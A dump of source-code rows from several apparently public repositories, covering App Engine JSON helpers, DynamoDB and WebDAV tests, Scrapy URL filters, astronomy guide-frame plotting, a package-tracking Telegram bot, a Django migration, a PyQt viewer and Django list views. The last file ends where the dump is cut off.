repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---|
yusufnb/umlsequence | tailbone/__init__.py | 1 | 5640 | # Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import functools
import json
import logging
import os
import re
import string
import time
import webapp2
from google.appengine import api
from google.appengine.ext import ndb
from google.appengine.ext import testbed
PREFIX = "/api/"
NAMESPACE = os.environ.get("NAMESPACE", "")
DEBUG = os.environ.get("SERVER_SOFTWARE", "").startswith("Dev")
# Custom Exceptions
class AppError(Exception):
pass
class BreakError(Exception):
pass
class LoginError(Exception):
pass
# Extensions to the jsonifying of python results
def json_extras(obj):
"""Extended json processing of types."""
if hasattr(obj, "get_result"): # RPC
return obj.get_result()
if hasattr(obj, "strftime"): # datetime
return obj.strftime("%Y-%m-%dT%H:%M:%S.") + str(obj.microsecond / 1000) + "Z"
if isinstance(obj, ndb.GeoPt):
return {"lat": obj.lat, "lon": obj.lon}
return None
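# A minimal usage sketch (values are illustrative only): json.dumps() falls
# back to json_extras() for types it cannot encode natively, e.g.
#   json.dumps({"at": datetime.datetime.utcnow(), "loc": ndb.GeoPt(52, 4)},
#              default=json_extras)
# serializes the datetime as an ISO-8601 style string and the GeoPt as
# {"lat": ..., "lon": ...}.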
# Decorator to return the result of a function as json. JSONP support exists but is commented out below.
def as_json(func):
"""Returns json when callback in url"""
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
self.response.headers["Content-Type"] = "application/json"
if DEBUG:
self.response.headers["Access-Control-Allow-Origin"] = "*"
self.response.headers["Access-Control-Allow-Methods"] = "POST,GET,PUT,PATCH,HEAD,OPTIONS"
self.response.headers["Access-Control-Allow-Headers"] = "Content-Type"
else:
api.namespace_manager.set_namespace(NAMESPACE)
try:
resp = func(self, *args, **kwargs)
if resp == None:
resp = {}
except BreakError as e:
return
except LoginError as e:
self.response.set_status(401)
url = api.users.create_login_url(self.request.url)
resp = {
"error": e.__class__.__name__,
"message": e.message,
"url": url
}
if api.app_identity.get_application_id() != testbed.DEFAULT_APP_ID:
logging.error(str(e))
except (AppError, api.datastore_errors.BadArgumentError,
api.datastore_errors.BadRequestError) as e:
self.response.set_status(400)
resp = { "error": e.__class__.__name__, "message": e.message }
if api.app_identity.get_application_id() != testbed.DEFAULT_APP_ID:
logging.error(str(e))
if not isinstance(resp, str) and not isinstance(resp, unicode):
resp = json.dumps(resp, default=json_extras)
# # UNCOMMENT TO ENABLE JSONP
# callback = self.request.get("callback")
# if callback:
# self.response.headers["Content-Type"] = "text/javascript"
        # resp = "%s(%s);" % (callback, resp)
self.response.out.write(resp)
return wrapper
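# A minimal usage sketch (handler class and payload are illustrative only):
# the decorator wraps webapp2 handler methods so whatever they return is
# serialized for the client, e.g.
#
#   class StatusHandler(webapp2.RequestHandler):
#       @as_json
#       def get(self):
#           return {"status": "ok"}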
# BaseHandler for error handling
class BaseHandler(webapp2.RequestHandler):
def handle_exception(self, exception, debug):
# Log the error.
logging.error(exception)
# If the exception is a HTTPException, use its error code.
# Otherwise use a generic 500 error code.
if isinstance(exception, webapp2.HTTPException):
self.response.set_status(exception.code)
else:
self.response.set_status(500)
return {"error": str(exception)}
re_json = re.compile(r"^application/json", re.IGNORECASE)
# Parse the body of an upload based on its content type. If you are trying to post a cgi.FieldStorage object
# you should instead upload those blobs separately via the special /api/files url.
def parse_body(self):
if re_json.match(self.request.content_type):
data = json.loads(self.request.body)
else:
data = {}
for k,v in self.request.POST.items():
if isinstance(v, cgi.FieldStorage):
raise AppError("Files should be uploaded separately as their own form to /api/files/ and \
then their ids should be uploaded and stored with the object.")
if type(v) in [str, unicode]:
try:
v = json.loads(v)
except ValueError:
pass
# TODO(doug): Bug when loading multiple json lists with same key
# TODO(doug): Bug when loading a number that should be a string representation of said number
if data.has_key(k):
current = data[k]
if isinstance(current, list):
current.append(v)
else:
data[k] = [current,v]
else:
data[k] = v
return data or {}
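# A minimal sketch of the behaviour above (field names are illustrative only):
# a form POST carrying  count=3&count=4&tags=["a","b"]  comes back as
# {"count": [3, 4], "tags": ["a", "b"]}, since string values are passed through
# json.loads() when possible and repeated keys are collected into a list.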
# converting numbers to strings so that the user id is represented more consistently
def convert_num_to_str(num):
s = ""
num = str(num)
i = 0
l = len(num)
letters = string.ascii_letters
while True:
if i == l-1:
s += letters[int(num[i])]
break
if i >= l:
break
x = num[i]
n = int(x+num[i+1])
if n < 52:
s += letters[n]
i += 2
else:
s += letters[int(x)]
i += 1
return s
def convert_str_to_num(s):
num = ""
for x in s:
num += str(string.ascii_letters.index(x))
return num
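# A worked example (illustrative): with string.ascii_letters as the alphabet,
# pairs of digits whose value is below 52 map to one letter and a final
# unpaired digit maps to letters[digit], so convert_num_to_str("12345") gives
# letters[12], letters[34], letters[5] -> "mIf", and convert_str_to_num("mIf")
# maps each letter back to its index, returning "12345".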
# Fetch the current user id or None
def current_user(required=False):
u = api.users.get_current_user()
if u:
return convert_num_to_str(u.user_id())
if required:
raise LoginError("User must be logged in.")
return None
| apache-2.0 | -7,691,145,162,515,019,000 | 30.333333 | 99 | 0.661525 | false |
succhiello/hieratic-dynamodb | tests/test_flat.py | 1 | 3792 | from pytest import fixture, raises
from datetime import datetime
from boto3.dynamodb.conditions import Key
from hieratic.collection import CollectionResource
from hieratic.index import SimpleIndex
@fixture
def UsersResource(UserResource, ddb):
@CollectionResource.define(
item_class=UserResource,
primary_index=SimpleIndex(('organization_id', int), ('id', int)),
)
class UsersRes(CollectionResource):
def __init__(self):
CollectionResource.__init__(
self, None,
'users',
'dynamodb',
'HieraticDynamoDBTestUser',
ddb,
)
return UsersRes
class TestFlat(object):
def test_flat(self, user_table, UsersResource, User):
users_resource = UsersResource()
now = datetime.now()
user_resource = users_resource.create(User(organization_id=0, id=0, created_at=now, phone={
'home': '00011112222',
'work': '33344445555',
}))
user = user_resource.data
assert user.organization_id == 0
assert user.id == 0
assert user.created_at == now
assert user.phone == {
'home': '00011112222',
'work': '33344445555',
}
user_resource = users_resource['0_0']
user = user_resource.data
assert user.organization_id == 0
assert user.id == 0
assert user.created_at == now
assert user.phone == {
'home': '00011112222',
'work': '33344445555',
}
        user_resource = users_resource.retrieve(0, 0)
user = user_resource.data
assert user.organization_id == 0
assert user.id == 0
assert user.created_at == now
assert user.phone == {
'home': '00011112222',
'work': '33344445555',
}
user_resource.update(name='updated', phone={'work': '66677778888'})
user = user_resource.data
assert user.name == 'updated'
assert user.phone == {
'home': '00011112222',
'work': '66677778888',
}
raw_user = users_resource.engine.table.get_item(Key={
'organization_id': 0,
'id': 0,
})['Item']
assert raw_user['name'] == 'updated'
assert raw_user['phone'] == {
'home': '00011112222',
'work': '66677778888',
}
user_resource.delete()
user = user_resource.data
assert user is None
with raises(KeyError):
users_resource['0_0']
with CollectionResource.get_context('dynamodb') as context:
users_resource.create(User(organization_id=0, id=1), context)
users_resource.create(User(organization_id=0, id=2), context)
users_resource.create(User(organization_id=0, id=3), context)
assert len(list(users_resource.query(KeyConditionExpression=Key('organization_id').eq(0)))) == 0
user_resources = [u_res for u_res in users_resource.query(KeyConditionExpression=Key('organization_id').eq(0))]
assert [1, 2, 3] == [u_res.data.id for u_res in user_resources]
assert [1, 3] == sorted(
u_res.data.id for u_res in
users_resource.bulk_get(Keys=[{'organization_id': 0, 'id': 1},
{'organization_id': 0, 'id': 3}])
)
with CollectionResource.get_context('dynamodb') as context:
for u_res in user_resources:
u_res.delete(context)
assert len(list(users_resource.query(KeyConditionExpression=Key('organization_id').eq(0)))) == 3
assert len(list(users_resource.query(KeyConditionExpression=Key('organization_id').eq(0)))) == 0 | mit | 2,531,767,255,374,252,000 | 31.698276 | 119 | 0.565137 | false |
qiyeboy/SpiderBook | ch15/15.3.py | 1 | 1487 | #coding:utf-8
from scrapy.dupefilters import RFPDupeFilter
class URLFilter(RFPDupeFilter):
"""根据url过滤"""
def __init__(self, path=None,debug=False):
self.urls_seen = set()
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
if request.url in self.urls_seen:
return True
else:
self.urls_seen.add(request.url)
'''
from scrapy.dupefilters import RFPDupeFilter
from w3lib.util.url import canonicalize_url
class URLSha1Filter(RFPDupeFilter):
"""根据urlsha1过滤"""
def __init__(self, path=None,debug=False):
self.urls_seen = set()
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
fp = hashlib.sha1()
fp.update(canonicalize_url(request.url))
url_sha1 = fp.hexdigest()
if url_sha1 in self.urls_seen:
return True
else:
self.urls_seen.add(url_sha1)
'''
'''
class URLBloomFilter(RFPDupeFilter):
"""根据urlhash_bloom过滤"""
def __init__(self, path=None,debug=False):
self.urls_sbf = ScalableBloomFilter(mode=ScalableBloomFilter.SMALL_SET_GROWTH)
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
fp = hashlib.sha1()
fp.update(canonicalize_url(request.url))
url_sha1 = fp.hexdigest()
if url_sha1 in self.urls_sbf:
return True
else:
self.urls_sbf.add(url_sha1)
''' | mit | 5,596,792,075,468,190,000 | 28.877551 | 86 | 0.611073 | false |
red-hood/calendarserver | txweb2/dav/test/test_options.py | 1 | 2178 | ##
# Copyright (c) 2005-2015 Apple Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# DRI: Wilfredo Sanchez, [email protected]
##
from txweb2.iweb import IResponse
import txweb2.dav.test.util
from txweb2.test.test_server import SimpleRequest
class OPTIONS(txweb2.dav.test.util.TestCase):
"""
OPTIONS request
"""
def test_DAV1(self):
"""
DAV level 1
"""
return self._test_level("1")
def test_DAV2(self):
"""
DAV level 2
"""
return self._test_level("2")
test_DAV2.todo = "DAV level 2 unimplemented"
def test_ACL(self):
"""
DAV ACL
"""
return self._test_level("access-control")
def _test_level(self, level):
def doTest(response):
response = IResponse(response)
dav = response.headers.getHeader("dav")
if not dav:
self.fail("no DAV header: %s" % (response.headers,))
self.assertIn(level, dav, "no DAV level %s header" % (level,))
return response
return self.send(SimpleRequest(self.site, "OPTIONS", "/"), doTest)
| apache-2.0 | 5,452,795,465,631,442,000 | 31.507463 | 80 | 0.671717 | false |
svalenti/FLOYDS_pipeline | site_code/plot_xmlguideinfo.py | 1 | 6671 | #!/opt/epd/bin/python
import pyfits
import os
#import matplotlib
#matplotlib.use('Agg')
import scipy
from numpy import array, where, nan
from xml.dom import minidom
from plot_guideinfo import plot_guideflux, plot_guidepos, plot_xposwtime, plot_yposwtime, plot_fwhmwtime, plot_guidestate
def mk_guideinfo_plots(rootname, utstart, utstop, logname, debug=True):
'''Generate plots from FITS guide images'''
if debug: print 'mk_guide_plots: Got:', rootname, utstart, utstop, logname
(timeimg_list, fileimg_list) = readlogfile(logname)
timeimg = scipy.array(timeimg_list)
fileimg = scipy.array(fileimg_list)
#pull out all lines from the guide file that happened between utstart and utstop
time_cull = timeimg * (timeimg > float(utstart)) * (timeimg < float(utstop))
timeimg_gd = timeimg[where(time_cull != 0)]
fileimg_gd = fileimg[where(time_cull != 0)]
if fileimg_gd.size <= 0:
print 'No guide frames taken during exposure!'
else:
guidecheck = 1
mjd_list = read_mjd_from_guide_fits(fileimg_gd)
mjd_arr = array(mjd_list)
mjd_arr = mjd_arr - (min(mjd_arr)-0.1/60.0/24.0)
mjd_arr_sec = mjd_arr*24.0*60.0*60.0
if debug >2: print mjd_list
guidestate_list = read_guidestate_from_guide_fits(fileimg_gd)
plot_guidestate(mjd_arr_sec,guidestate_list)
guidestateplotname = rootname+'_guidestate.png'
retval = os.system('mv yo.png '+guidestateplotname)
if debug: print "mv from yo.png to",guidestateplotname,"had status",retval
# xmlfiles_gd = [f.replace('.fits', '.fits.inst.guide.xml') for f in fileimg_gd]
xmlfiles_gd = [f.replace('.fits', '.fits.guide.xml').replace('flash/', 'cat/') for f in fileimg_gd]
if debug: print xmlfiles_gd
(totcnts_gd, xcen_gd, ycen_gd, fwhm_gd) = read_stats_from_xml_files(xmlfiles_gd)
plot_guideflux(mjd_arr_sec,totcnts_gd)
guidecountplotname = rootname+'_guidecounts.png'
retval = os.system('mv yo.png '+guidecountplotname)
if debug: print "mv from yo.png to",guidecountplotname,"had status",retval
plot_guidepos(xcen_gd,ycen_gd)
guidexypos_plotname = rootname+'_guidexy.png'
retval = os.system('mv yo_xy.png '+guidexypos_plotname)
if debug: print "mv from yo_xy.png to",guidexypos_plotname,"had status",retval
plot_xposwtime(mjd_arr_sec,xcen_gd)
guidext_plotname = rootname+'_guidext.png'
retval = os.system('mv yo_xt.png '+guidext_plotname)
if debug: print "mv from yo_xt.png to",guidext_plotname,"had status",retval
plot_yposwtime(mjd_arr_sec,ycen_gd)
guideyt_plotname = rootname+'_guideyt.png'
retval = os.system('mv yo_yt.png '+guideyt_plotname)
if debug: print "mv from yo_yt.png to",guideyt_plotname,"had status",retval
plot_fwhmwtime(mjd_arr_sec,fwhm_gd)
guidefwhmt_plotname = rootname+'_guidefwhmt.png'
retval = os.system('mv yo_fwhm.png '+guidefwhmt_plotname)
if debug: print "mv from yo_fwhm.png to",guidefwhmt_plotname,"had status",retval
return
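# A minimal usage sketch (file names and UT times are illustrative only):
#   mk_guideinfo_plots('ogg2m001-en06-20140411-0042', '093000', '101500',
#                      'guide_frames.log')
# reads the log, keeps guide frames taken between the two UT times and writes
# <rootname>_guidestate.png, _guidecounts.png, _guidexy.png, _guidext.png,
# _guideyt.png and _guidefwhmt.png.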
def readlogfile(logfile):
'''Read in the new-style guide log which consists of UTC datetime of guide
frame start (e.g. 20140411050644) and the path and filename of the guide
image.
The HHMMSS part of the datetime and the filenames are returned in 2 lists'''
log_fh = open(logfile, 'r')
timeimg = []
fileimg = []
for line in log_fh.readlines():
chunks = line.split()
if len(chunks) == 2:
timestr = chunks[0]
timestr = timestr[8:]
timeimg.append(float(timestr))
fileimg.append(chunks[1])
log_fh.close()
return [timeimg, fileimg]
def read_mjd_from_guide_fits(fits_images):
'''Loops through the <fits_images> list of FITS guide frames, reading in
the MJD and returning this as a list of floats'''
mjd_list = []
for _fileimg in fits_images:
headlist = pyfits.open(_fileimg)
headnow = headlist[0].header
mjdnow = headnow['MJD-OBS']
try:
mjd_list.append(float(mjdnow))
except NameError:
mjd_list = [float(mjdnow)]
headlist.close()
return mjd_list
def read_guidestate_from_guide_fits(fits_images):
'''Loops through the <fits_images> list of FITS guide frames, reading in
the AGSTATE and returning this as a list of strings'''
guidestate_list = []
for _fileimg in fits_images:
headlist = pyfits.open(_fileimg)
headnow = headlist[0].header
guidestatenow = headnow['AGSTATE']
try:
guidestate_list.append(guidestatenow)
except NameError:
guidestate_list = [guidestatenow]
headlist.close()
return guidestate_list
def read_stats_from_xml_files(xmlfiles):
totcnts_gd = []
xcen_gd = []
ycen_gd = []
fwhm_gd = []
for x in xmlfiles:
(counts, fwhm, x_center, y_center) = read_xml_guide_file(x)
if None not in [counts, fwhm, x_center, y_center]:
totcnts_gd.append(counts)
xcen_gd.append(x_center)
ycen_gd.append(y_center)
fwhm_gd.append(fwhm)
else:
print "No values found for", x
return (totcnts_gd, xcen_gd, ycen_gd, fwhm_gd)
def getXMLvalues(element, tag, debug=False):
    '''Return the text value of the first child node of the first element
    matching <tag> inside <element>; print the value when debug is True.'''
thing = element.getElementsByTagName(tag)[0]
thing_value = thing.childNodes[0].data
if debug: print thing_value
return thing_value
def read_xml_guide_file(guidefile, debug=False):
guide_doc = minidom.parse(guidefile)
centroids = guide_doc.getElementsByTagName("centroids")
flux_value = nan
fwhm_value = nan
x_pixel = nan
y_pixel = nan
for centroid in centroids:
guidestar = centroid.getElementsByTagName("guideStar")[0]
gs_value = guidestar.childNodes[0]
if debug: print gs_value
if gs_value.data == 'true':
if debug: print "Found guidestar", gs_value.nodeType, gs_value.nodeValue
flux_value = getXMLvalues(centroid, "totalFlux")
fwhm_value = getXMLvalues(centroid, "fwhm")
guidepixel = centroid.getElementsByTagName("pixel")[0]
x_pixel = getXMLvalues(guidepixel, "x")
y_pixel = getXMLvalues(guidepixel, "y")
return (flux_value, fwhm_value, x_pixel, y_pixel)
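# A minimal sketch (inferred from the parsing above; values are illustrative)
# of the guide XML layout this function expects:
#   <centroids>
#     <guideStar>true</guideStar>
#     <totalFlux>12345.0</totalFlux>
#     <fwhm>2.3</fwhm>
#     <pixel><x>512.1</x><y>498.7</y></pixel>
#   </centroids>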
| mit | 424,357,099,756,460,800 | 34.484043 | 121 | 0.637086 | false |
GabrielRF/RastreioBot | async_routine.py | 1 | 5684 | import configparser
import logging.handlers
import sys
from datetime import datetime
from time import time, sleep
from utils.misc import check_update
from utils.misc import async_check_update
from utils.misc import check_type
import apis.apicorreios as correios
import apis.apitrackingmore as trackingmore
from rastreio import db as db_ops
import random
import requests
import telebot
import asyncio
import motor.motor_asyncio
from aiogram import Bot, Dispatcher, executor, types
from aiogram.utils import executor
config = configparser.ConfigParser()
config.read('bot.conf')
TOKEN = config['RASTREIOBOT']['TOKEN']
LOG_ALERTS_FILE = config['RASTREIOBOT']['alerts_log']
PATREON = config['RASTREIOBOT']['patreon']
INTERVAL = 0.03
logger_info = logging.getLogger('InfoLogger')
handler_info = logging.handlers.TimedRotatingFileHandler(
LOG_ALERTS_FILE, when='midnight', interval=1, backupCount=7, encoding='utf-8'
)
#handler_info = logging.FileHandler(LOG_ALERTS_FILE)
logger_info.setLevel(logging.DEBUG)
logger_info.addHandler(handler_info)
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
client = motor.motor_asyncio.AsyncIOMotorClient()
db = client.rastreiobot
async def get_package(code):
print(code)
stat = await async_check_update(code)
if stat == 0:
stat = 'Sistema dos Correios fora do ar.'
elif stat == 1:
stat = None
elif stat == 3:
stat = None
else:
cursor = await db.rastreiobot.update_one (
{ "code" : code.upper() },
{
"$set": {
"stat" : stat,
"time" : str(time())
}
})
stat = 10
return stat
def check_system():
try:
URL = ('http://webservice.correios.com.br/')
response = requests.get(URL, timeout=10)
except:
logger_info.info(str(datetime.now()) + '\tCorreios indisponível')
return False
if '200' in str(response):
return True
else:
logger_info.info(str(datetime.now()) + '\tCorreios indisponível')
return False
def is_finished_package(old_state):
old_state = old_state.lower()
finished_states = [
'objeto entregue ao',
'objeto apreendido por órgão de fiscalização',
'objeto devolvido',
'objeto roubado',
'delivered',
'postado',
'ect',
]
for state in finished_states:
if state in old_state:
return True
return False
async def up_package(elem):
code = elem['code']
should_retry_finished_package = random.randint(0,5)
try:
old_state = elem['stat'][len(elem['stat'])-1].lower()
len_old_state = len(elem['stat'])
except:
old_state = ""
len_old_state = 1
if is_finished_package(old_state) and not should_retry_finished_package:
return
stat = await get_package(code)
if stat == 0:
return
cursor2 = await db.rastreiobot.find_one(
{
"code": code
})
try:
len_new_state = len(cursor2['stat'])
except:
len_new_state = 1
if len_old_state == len_new_state:
return
len_diff = len_new_state - len_old_state
for user in elem.get('users', []):
logger_info.info(str(datetime.now()) + ' '
+ str(code) + ' \t' + str(user) + ' \t'
+ str(len_old_state) + '\t'
+ str(len_new_state) + '\t' + str(len_diff))
try:
try:
                # Chinese package with a Brazilian tracking code
message = (str(u'\U0001F4EE') + '<b>' + code + '</b> (' + elem['code_br'] + ')\n')
except:
message = (str(u'\U0001F4EE') + '<a href="https://t.me/rastreiobot?start=' + code + '">' + code + '</a>\n')
try:
if code not in elem[user]:
message = message + '<b>' + elem[user] + '</b>\n'
except:
pass
for k in reversed(range(1,len_diff+1)):
message = (
message + '\n'
+ cursor2['stat'][len(cursor2['stat'])-k] + '\n')
if 'objeto entregue' in message.lower() and user not in PATREON:
message = (message + '\n'
+ str(u'\U0001F4B3')
+ ' Me ajude a manter o projeto vivo!\nEnvie /doar e veja as opções '
+ str(u'\U0001F4B5'))
if len_old_state < len_new_state:
await bot.send_message(str(user), message, parse_mode='HTML',
disable_web_page_preview=True)
except Exception as e:
logger_info.info(str(datetime.now())
+ ' EXCEPT: ' + str(user) + ' ' + code + ' ' + str(e))
if 'deactivated' in str(e):
db_ops.remove_user_from_package(code, str(user))
elif 'blocked' in str(e):
db_ops.remove_user_from_package(code, str(user))
elif 'kicked' in str(e):
db_ops.remove_user_from_package(code, str(user))
continue
async def async_main():
cursor1 = db.rastreiobot.find()
start = time()
if check_system():
pass
else:
print("exit")
return
# await bot.send_message(str(-340600919), "oi", parse_mode='HTML',
# disable_web_page_preview=True)
tasks = []
n = 0
async for elem in cursor1:
api_type = check_type(elem['code'])
if api_type is correios:
n += 1
tasks.append(up_package(elem))
await asyncio.gather(*tasks)
if __name__ == '__main__':
executor.start(dp, async_main())
    # query the database
    # call the API
    # talk to the user
| gpl-3.0 | -1,492,536,038,591,025,700 | 27.238806 | 123 | 0.563073 | false |
sunlightlabs/hanuman | extraction/migrations/0001_initial.py | 1 | 1699 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.contrib.postgres.fields
import uuid
class Migration(migrations.Migration):
dependencies = [
('data_collection', '0004_auto_20150512_2124'),
]
operations = [
migrations.CreateModel(
name='Bio',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.TextField()),
('bio_text', django.contrib.postgres.fields.ArrayField(size=None, base_field=models.TextField(), blank=True)),
('url', models.URLField()),
('position', models.PositiveIntegerField(default=0)),
('automated', models.BooleanField(default=True)),
('firm', models.ForeignKey(to='data_collection.Firm')),
],
),
migrations.CreateModel(
name='FirmTrainingSet',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('spider_complete', models.BooleanField(default=False)),
('page_classifier_trained', models.BooleanField(default=False)),
('element_classifier_trained', models.BooleanField(default=False)),
('extraction_complete', models.BooleanField(default=False)),
('firm', models.OneToOneField(to='data_collection.Firm')),
],
),
migrations.AlterUniqueTogether(
name='bio',
unique_together=set([('url', 'position')]),
),
]
| bsd-3-clause | -7,269,391,328,728,008,000 | 38.511628 | 126 | 0.576221 | false |
Ultimaker/Uranium | examples/definition_viewer/main.py | 1 | 2488 | # Copyright (c) 2017 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
import sys
import os.path
import signal
import traceback
from PyQt5.QtCore import QObject, QUrl, pyqtSlot, pyqtProperty, pyqtSignal
from PyQt5.QtQml import QQmlApplicationEngine, qmlRegisterType
from PyQt5.QtWidgets import QApplication
import UM.Resources
import UM.Settings
import DefinitionTreeModel
class DefinitionLoader(QObject):
def __init__(self, parent = None):
super().__init__(parent)
self._metadata = {}
self._definition_id = ""
@pyqtSlot("QUrl", result = str)
def load(self, file_path):
try:
definition = UM.Settings.DefinitionContainer(file_path.fileName())
dirname = os.path.dirname(file_path.toLocalFile())
UM.Resources.Resources.addSearchPath(dirname)
UM.Resources.Resources.addSearchPath(os.path.realpath(os.path.join(dirname, "..")))
with open(file_path.toLocalFile(), encoding = "utf-8") as data:
definition.deserialize(data.read())
self._metadata = dict(definition.metaData)
self.metaDataChanged.emit()
UM.Settings.ContainerRegistry.ContainerRegistry.getInstance().addContainer(definition)
self._definition_id = definition.id
self.loaded.emit()
except Exception as e:
error_text = "An exception occurred loading file {0}:\n".format(file_path)
error_text += str(e)
error_text += traceback.format_exc()
self.error.emit(error_text)
loaded = pyqtSignal()
error = pyqtSignal(str, arguments=["errorText"])
metaDataChanged = pyqtSignal()
@pyqtProperty("QVariantMap", notify=metaDataChanged)
def metaData(self):
return self._metadata
@pyqtProperty(str, notify=loaded)
def definitionId(self):
return self._definition_id
signal.signal(signal.SIGINT, signal.SIG_DFL)
file_name = None
if len(sys.argv) > 1:
file_name = sys.argv[1]
del sys.argv[1]
app = QApplication(sys.argv)
engine = QQmlApplicationEngine()
qmlRegisterType(DefinitionLoader, "Example", 1, 0, "DefinitionLoader")
qmlRegisterType(DefinitionTreeModel.DefinitionTreeModel, "Example", 1, 0, "DefinitionTreeModel")
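# A minimal QML usage sketch (handler bodies are illustrative only): with the
# registrations above, main.qml can import Example 1.0 and declare
#   DefinitionLoader { id: loader; onError: console.log(errorText) }
# then call loader.load(fileUrl) to fill loader.metaData and loader.definitionId.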
if file_name:
engine.rootContext().setContextProperty("open_file", QUrl.fromLocalFile(file_name))
engine.load(os.path.join(os.path.dirname(os.path.abspath(__file__)), "main.qml"))
app.exec_()
| lgpl-3.0 | 230,418,118,665,629,400 | 30.897436 | 98 | 0.67926 | false |
vanyh/handkeinzungen-app | browsing/views.py | 1 | 13527 | from django_tables2 import SingleTableView, RequestConfig
from bib.models import *
from words.models import ForeignLemma, GermanLemma
from .filters import *
from .forms import *
from .tables import *
class GenericListView(SingleTableView):
filter_class = None
formhelper_class = None
context_filter_name = 'filter'
paginate_by = 25
template_name = 'browsing/generic_list.html'
def get_queryset(self, **kwargs):
qs = super(GenericListView, self).get_queryset()
self.filter = self.filter_class(self.request.GET, queryset=qs)
self.filter.form.helper = self.formhelper_class()
return self.filter.qs
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
return table
def get_context_data(self, **kwargs):
context = super(GenericListView, self).get_context_data()
# context[self.context_filter_name] = self.filter
context['docstring'] = "{}".format(self.model.__doc__)
try:
context['class_name'] = self.model.get_alternative_classname()
except AttributeError:
if self.model.__name__.endswith('s'):
context['class_name'] = "{}".format(self.model.__name__)
else:
context['class_name'] = "{}s".format(self.model.__name__)
try:
context['create_view_link'] = self.model.get_createview_url()
except AttributeError:
context['create_view_link'] = None
return context
class PlaceListView(GenericListView):
model = Place
table_class = PlaceTable
filter_class = PlaceListFilter
formhelper_class = PlaceFilterFormHelper
init_columns = ['id', 'name', 'part_of']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(PlaceListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class AlternativeNameListView(GenericListView):
model = AlternativeName
table_class = AlternativeNameTable
filter_class = AlternativeNameListFilter
formhelper_class = AlternativeNameFilterFormHelper
init_columns = ['id', 'name', 'part_of']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(AlternativeNameListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class GermanLemmaListView(GenericListView):
model = GermanLemma
table_class = GermanLemmaTable
filter_class = GermanLemmaListFilter
formhelper_class = GermanLemmaFilterFormHelper
init_columns = ['lemma', 'url', 'pos', 'translation']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(GermanLemmaListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class ForeignLemmaListView(GenericListView):
model = ForeignLemma
table_class = ForeignLemmaTable
filter_class = ForeignLemmaListFilter
formhelper_class = ForeignLemmaFilterFormHelper
init_columns = ['lemma', 'language', 'uebersetzung']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(ForeignLemmaListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
